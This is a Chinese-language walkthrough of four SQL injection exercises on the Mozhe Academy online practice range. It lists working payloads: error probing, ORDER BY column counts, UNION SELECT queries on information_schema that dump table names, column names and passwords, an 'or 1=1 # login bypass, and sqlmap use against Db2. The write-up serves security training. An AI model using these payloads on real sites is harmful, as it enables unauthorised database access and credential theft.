第一题: SQL注入漏洞测试(POST) 1.网址:SQL注入漏洞测试(POST) _数据库安全_在线靶场_墨者学院_专注于网络安全人才培养 2.目标:通过POST方式进行SQL注入,获取数据库的账户密码 3.解题过程: 在登陆界面使用BurpSuite抓包 输入分号:' 会报错输入注释符:-- -回复正常证明为字符型注入输入语句查询多少列:order by +数字输入联合语句:union select 1,2,3 第二题 SQL手工注入漏洞测试(MySQL数据库) 1.网址:SQL手工注入漏洞测试(MySQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 2.目标:手工进行SQL注入测试,获取管理密码登录。了解information_schema数据库 3.解题过程: 通过and语句判断是否能注入 and 1=1 正确and 1=2 不正确 通过order by判断几列 联合查询语句替换页面回显点查库名 -1 union select 1,database(),3,4 查表名 -1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="库名"),4 查列名 -1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="库名"and table_name="表名"),4 查内容 -1 union select 1,2,(select group_concat(name) from 表名),4 -1 union select 1,2,(select group_concat(password) from 表名),4 用MD5进行密文转义 第三题 SQL注入漏洞测试(登录绕过) 1.网址:SQL注入漏洞测试(登录绕过)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 2.目标:利用万能密码绕过登录验证 3.解题步骤 'or 1=1 #将密码注释 第四题: SQL手工注入漏洞测试(Db2数据库) 1.网址:SQL手工注入漏洞测试(Db2数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 2.目标:手工进行SQL注入测试,获取管理密码登录。因为该题使用Db2的数据结构,语法和MySQL不同,使用sqlmap工具 3.解题步骤: sqlmap跑出来数据库 选择DB2INST1查表名 我们发现查到了ID,但是其他的藏起来了我们拿-C 猜里面列名: MD5进行编译